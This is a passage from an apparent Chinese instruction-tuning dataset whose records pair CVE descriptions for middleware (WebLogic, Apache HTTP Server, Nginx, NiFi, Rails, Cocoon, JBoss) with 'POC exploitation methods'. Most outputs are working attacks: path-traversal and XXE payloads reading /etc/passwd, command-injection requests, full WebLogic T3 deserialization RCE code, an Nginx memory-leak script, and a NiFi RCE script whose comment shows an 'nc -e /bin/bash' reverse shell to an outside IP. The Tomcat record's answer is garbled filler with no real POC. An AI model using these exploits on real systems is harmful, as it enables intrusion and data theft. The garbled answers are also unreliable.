  140. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat 信息泄露漏洞 CVE-2021-24122\n漏洞描述:使用NTFS文件系统从网络位置提供资源时,Apache Tomcat版本10.0.0-M1至10.0.0-M9、9.0.0.0.M1至9.0.39、8.5.0至8.5.59和7.0.0至7.0.106在某些配置中容易受到JSP源代码公开的影响。根本原因是JRE API File.getCanonicalPath()的意外行为,这又是由Windows API(FindFirstFileW)在某些情况下的不一致行为引起的。\n影响版本:``` Apache Tomcat 10.0.0-M1-10.0.0-M9 Apache Tomcat 9.0.0.M1-9.0.39 Apache Tomcat 8.5.0-8.5.59 Apache Tomcat 7.0.0-7.0.106 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-24122\n【POC利用方法】\n1. Apache Tomcat 10.0.0-M1-10.0.0-M9\nApache Tomcat 9.0.0.M1-9.0.39\nApache Tomcat 8.5.0-8.5.59\nApache Tomcat 7.0.0-7.0.106\n2. getCanonicalPath()\n\n此路径方法返回绝对唯一的标准规范路径名。此方法首先将此路径名转换为绝对形式,就像调用getAbsolutePath方法一样,然后以系统相关的方式将其映射到其唯一路径上。\n也就是说如果路径中包含“.”或“..”等当前路径及上层路径表示法,则会从路径名中删除“.”和“..”使用真实路径代替。另外比较重点的是 它还会解析软链接(在UNIX平台上)以及将驱动器号(在Microsoft Windows平台上),将它们转换为标准实际路径。\n3. 使用NTFS文件系统从网络位置提供资源时,Apache Tomcat版本10.0.0-M1至10.0.0-M9、9.0.0.0.M1至9.0.39、8.5.0至8.5.59和7.0.0至7.0.106在某些配置中容易受到JSP源代码公开的影响。根本原因是JRE API File.getCanonicalPath()的意外行为,这又是由Windows API(FindFirstFileW)在某些情况下的不一致行为引起的。\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Tomcat 信息泄露漏洞 CVE-2021-24122.md"}
    141. 

  141. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Ruby On Rails 路径穿越漏洞 CVE-2018-3760\n漏洞描述:Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。 Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用`%252e%252e/`来跨越到根目录,读取或执行目标服务器上任意文件。 参考链接: - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf - https://seclists.org/oss-sec/2018/q2/210 - https://xz.aliyun.com/t/2542\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-3760\n【POC利用方法】\n1. docker-compose up -d\n2. http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd\n3. 直接访问`http://your-ip:3000/assets/file:%2f%2f/etc/passwd`,将会报错,因为文件`/etc/passwd`不在允许的目录中。\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Ruby On Rails 路径穿越漏洞 CVE-2018-3760.md"}
    142. 

  142. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504\n漏洞描述:Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-7504\n【POC利用方法】\n1. https://github.com/vulhub/vulhub.git\ncd vulhub/jboss/CVE-2017-7504\ndocker-compose build\ndocker-compose up -d\n2. python3 jexboss.py -host http://192.168.51.133:8080\n3. cd vulhub/jboss/CVE-2017-7504\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504.md"}
    143. 

  143. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic 未授权远程代码执行漏洞 CVE-2023-21839\n漏洞描述:Oracle WebLogic Server是业界领先的应用程序服务器,用于使用Java EE标准构建企业应用程序,并以低拥有成本将其部署在可靠、可扩展的运行时。 在 [Oracle 2023年1月安全公告日](https://www.oracle.com/security-alerts/cpujan2023.html) 修复了这个漏洞。 CVE-2023-21839 允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致 RCE 漏洞。 参考链接: - https://www.oracle.com/security-alerts/cpujan2023.html\n影响版本:``` Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 Oracle WebLogic Server 14.1.1.0.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-21839\n【POC利用方法】\n1. Oracle WebLogic Server 12.2.1.3.0\nOracle WebLogic Server 12.2.1.4.0\nOracle WebLogic Server 14.1.1.0.0\n2. docker-compose up -d\n3. cd cmd\ngo build -o CVE-2023-21839\n./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic 未授权远程代码执行漏洞 CVE-2023-21839.md"}
    144. 

  144. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic Server 远程代码执行漏洞 CVE-2020-14756\n漏洞描述:weblogic的T3协议反序列化漏洞一直是一个比较热门也比较好用的漏洞,weblogic针对该漏洞的解决方案就是不断填充黑名单,在高版本jdk下配合jep290机制实现黑名单,在低版本下配合resolveClass进行防御,所以安全人员对于T3反序列化的利用也是一直在寻找黑名单之外的利用链。 CVE-2020-14756 这个漏洞的利用比较巧妙,通过利用weblogic coherence组件中的类,绕过了黑名单机制的检测,重新能够利用黑名单中的类,造成代码执行。 参考链接: - https://www.oracle.com/security-alerts/cpujan2021.html#AppendixFMW - https://github.com/Y4er/CVE-2020-14756\n影响版本:``` Oracle Weblogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-14756\n【POC利用方法】\n1. Oracle Weblogic Server 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0\n2. package com.supeream;\n\nimport com.supeream.serial.Serializables;\nimport com.supeream.weblogic.T3ProtocolOperation;\n// coherence-rest.jar\nimport com.tangosol.coherence.rest.util.extractor.MvelExtractor;\n// coherence-web.jar\nimport com.tangosol.coherence.servlet.AttributeHolder;\n// coherence.jar\nimport com.tangosol.util.SortedBag;\nimport com.tangosol.util.aggregator.TopNAggregator;\n\nimport java.io.File;\nimport java.io.FileOutputStream;\nimport java.io.ObjectOutputStream;\nimport java.lang.reflect.Field;\nimport java.lang.reflect.Method;\n\npublic class CVE_2020_14756 {\n    public static void main(String[] args) {\n        MvelExtractor extractor = new MvelExtractor(\"java.lang.Runtime.getRuntime().exec(\\\"calc\\\");\");\n        MvelExtractor extractor2 = new MvelExtractor(\"\");\n\n        try {\n            SortedBag sortedBag = new TopNAggregator.PartialResult(extractor2, 2);\n            AttributeHolder attributeHolder = new AttributeHolder();\n            sortedBag.add(1);\n\n            Field m_comparator = sortedBag.getClass().getSuperclass().getDeclaredField(\"m_comparator\");\n            m_comparator.setAccessible(true);\n            m_comparator.set(sortedBag, extractor);\n\n            Method setInternalValue = attributeHolder.getClass().getDeclaredMethod(\"setInternalValue\", Object.class);\n            setInternalValue.setAccessible(true);\n            setInternalValue.invoke(attributeHolder, sortedBag);\n            /*\n            FileOutputStream fileOutputStream = new FileOutputStream(new File(\"test.ser\"));\n            ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);\n            objectOutputStream.writeObject(attributeHolder);\n            */\n            T3ProtocolOperation.send(\"192.168.65.128\", \"7001\", Serializables.serialize(attributeHolder));\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}\n3. #!/usr/bin/python\nimport socket\nimport os\nimport sys\nimport struct\n\nif len(sys.argv) < 3:\n    print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])\n    sys.exit()\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.settimeout(5)\n\nserver_address = (sys.argv[1], int(sys.argv[2]))\nprint '[+] Connecting to %s port %s' % server_address\nsock.connect(server_address)\n\n# Send headers\nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n'\nprint 'sending \"%s\"' % headers\nsock.sendall(headers)\n\ndata = sock.recv(1024)\nprint >>sys.stderr, 'received \"%s\"' % data\n\npayloadObj = open(sys.argv[3],'rb').read()\n\npayload='\\x00\\x00\\x09\\xf3\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\npayload=payload+payloadObj\npayload=payload+'\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78'\n\n# adjust header for appropriate message length\npayload=struct.pack('>I',len(payload)) + payload[4:]\n\nprint '[+] Sending payload...'\nsock.send(payload)\ndata = sock.recv(1024)\nprint >>sys.stderr, 'received \"%s\"' % data\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic Server远程代码执行漏洞 CVE-2020-14756.md"}
    145. 

  145. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Ruby Net::FTP 模块命令注入漏洞 CVE-2017-17405\n漏洞描述:Ruby Net::FTP 模块是一个FTP客户端,在上传和下载文件的过程中,打开本地文件时使用了`open`函数。而在ruby中,`open`函数是借用系统命令来打开文件,且没用过滤shell字符,导致在用户控制文件名的情况下,将可以注入任意命令。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-17405\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. # 安装pyftpdlib\npip install pyftpdlib\n\n# 在当前目录下启动一个ftp服务器,默认监听在`0.0.0.0:2121`端口\npython3 -m pyftpdlib -p 2121 -i 0.0.0.0\n3. GET /download?uri=ftp://your-vps:2121/&file=|touch${IFS}awesome_poc.txt HTTP/1.1\nHost: your-ip:8080\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\nAccept: */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nConnection: close\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Ruby NetFTP 模块命令注入漏洞 CVE-2017-17405.md"}
    146. 

  146. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Cocoon XML注入 CVE-2020-11991\n漏洞描述:9月11日 Apache 软件基金会发布安全公告,修复了 Apache Cocoon xml外部实体注入漏洞(CVE-2020-11991)。 Apache Cocoon 是一个基于 Spring 框架的围绕分离理念建立的构架,在这种框架下的所有处理都被预先定义好的处理组件线性连接起来,能够将输入和产生的输出按照流水线顺序处理。用户群:Apache Lenya、Daisy CMS、Hippo CMS、Mindquarry等等,Apache Cocoon 通常被作为一个数据抽取、转换、加载工具或者是系统之间传输数据的中转站。CVE-2020-11991 与 StreamGenerator 有关,在使用 StreamGenerator 时,代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。\n影响版本:``` Apache Cocoon <= 2.1.12 ```\n网络测绘:``` app=\"Apache-Cocoon\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-11991\n【POC利用方法】\n1. Apache Cocoon <= 2.1.12\n2. app=\"Apache-Cocoon\"\n3. <!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName> \n<lastName>&ent;</lastName>\n</userInfo>\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Cocoon XML注入 CVE-2020-11991.md"}
    147. 

  147. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nginx越界读取缓存漏洞 CVE-2017-7529\n漏洞描述:参考阅读: - https://cert.360.cn/detailnews.html?id=b879782fbad4a7f773b6c18490d67ac7 - [http://galaxylab.org/cve-2017-7529-nginx%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/](http://galaxylab.org/cve-2017-7529-nginx整数溢出漏洞分析/) Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。\n影响版本:``` Nginx version 0.5.6 - 1.13.2 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-7529\n【POC利用方法】\n1. Nginx version 0.5.6 - 1.13.2\n2. docker-compose up -d\n3. #!/usr/bin/env python\nimport sys\nimport requests\n\nif len(sys.argv) < 2:\n    print(\"%s url\" % (sys.argv[0]))\n    print(\"eg: python %s http://your-ip:8080/\" % (sys.argv[0]))\n    sys.exit()\n\nheaders = {\n    'User-Agent': \"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240\"\n}\noffset = 605\nurl = sys.argv[1]\nfile_len = len(requests.get(url, headers=headers).content)\nn = file_len + offset\nheaders['Range'] = \"bytes=-%d,-%d\" % (\n    n, 0x8000000000000000 - n)\n\nr = requests.get(url, headers=headers)\nprint(r.text)\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Nginx越界读取缓存漏洞 CVE-2017-7529.md"}
    148. 

  148. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache NiFi Api 远程代码执行 RCE\n漏洞描述:Apache NiFi是Apache Software Foundation的一个软件项目,旨在使软件系统之间的数据流自动化。 参考链接: - https://twitter.com/chybeta/status/1333341820596568065 - https://github.com/imjdl/Apache-NiFi-Api-RCE - https://forum.ywhack.com/thread-114763-1-3.html\n网络测绘:``` \"nifi\" && title==\"NiFi\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. \"nifi\" && title==\"NiFi\"\n2. import sys\nimport json\nimport requests as req\n\n\nclass Exp:\n    def __init__(self, url):\n        self.url = url\n\n    def check_is_vul(self):\n        url = self.url + \"/nifi-api/access/config\"\n        try:\n            res = req.get(url=url, verify=False)\n            data = res.json()\n            return not data[\"config\"][\"supportsLogin\"]\n        except Exception as e:\n            pass\n        return False\n\n    def clean_up(self, p_id):\n        url = self.url + \"/nifi-api/processors/\" + p_id + \"/run-status\"\n        data = {'revision': {'clientId': 'x', 'version': 1}, 'state': 'STOPPED'}\n        req.put(url=url, data=json.dumps(data), verify=False)\n        req.delete(url + \"/threads\", verify=False)\n\n    def exploit(self, cmd):\n        g_id = self.fetch_process_group()\n        if g_id:\n            p_id = self.create_process(g_id)\n            if p_id:\n                self.run_cmd(p_id=p_id, cmd=cmd)\n                self.clean_up(p_id=p_id)\n\n    def run_cmd(self, p_id, cmd):\n        url = self.url + \"/nifi-api/processors/\" + p_id\n        cmd = cmd.split(\" \")\n        data = {\n            'component': {\n                'config': {\n                    'autoTerminatedRelationships': ['success'],\n                    'properties': {\n                        'Command': cmd[0],\n                        'Command Arguments': \" \".join(cmd[1:]),\n                    },\n                    'schedulingPeriod': '3600 sec'\n                },\n                'id': p_id,\n                'state': 'RUNNING'\n            },\n            'revision': {'clientId': 'x', 'version': 1}\n        }\n        print(data)\n        headers = {\n            \"Content-Type\": \"application/json\",\n        }\n        res = req.put(url=url, data=json.dumps(data), headers=headers, verify=False)\n        return res.json()\n\n    def fetch_process_group(self):\n        url = self.url + \"/nifi-api/process-groups/root\"\n        try:\n            res = req.get(url=url, verify=False)\n            data = res.json()[\"id\"]\n            return data\n        except Exception as e:\n            pass\n        return 0\n\n    def create_process(self, process_group_id):\n        url = self.url + \"/nifi-api/process-groups/\" + process_group_id + \"/processors\"\n        data = {\n            'component': {\n                'type': 'org.apache.nifi.processors.standard.ExecuteProcess'\n            },\n            'revision': {\n                'version': 0\n            }\n        }\n        headers = {\n            \"Content-Type\": \"application/json\",\n        }\n        try:\n            res = req.post(url=url, data=json.dumps(data), headers=headers, verify=False)\n            return res.json()[\"id\"]\n        except Exception as e:\n            pass\n        return 0\n\n\nif __name__ == '__main__':\n    if len(sys.argv) != 3:\n        print(\"rce.py url cmd\")\n    else:\n        url = sys.argv[1]  # http://192.168.1.1:8080\n        cmd = sys.argv[2]  # nc -e /bin/bash 192.168.1.129 1234\n        e = Exp(url)\n        e.exploit(cmd)\n3. https://packetstormsecurity.com/files/160260/apache_nifi_processor_rce.rb.txt\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache NiFi Api 远程代码执行 RCE.md"}
    149. 

  149. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache HTTP Server 2.4.49 路径穿越漏洞 CVE-2021-41773\n漏洞描述:Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响: - 版本等于2.4.49 - 穿越的目录允许被访问,比如配置了`<Directory />Require all granted</Directory>`。(默认情况下是不允许的) 攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。 参考链接: - https://httpd.apache.org/security/vulnerabilities_24.html - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/HackerGautam/status/1445412108863041544 - https://twitter.com/snyff/status/1445565903161102344\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-41773\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\n3. curl -v --data \"echo;id\" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache HTTP Server 2.4.49 路径穿越漏洞 CVE-2021-41773.md"}
    150. 

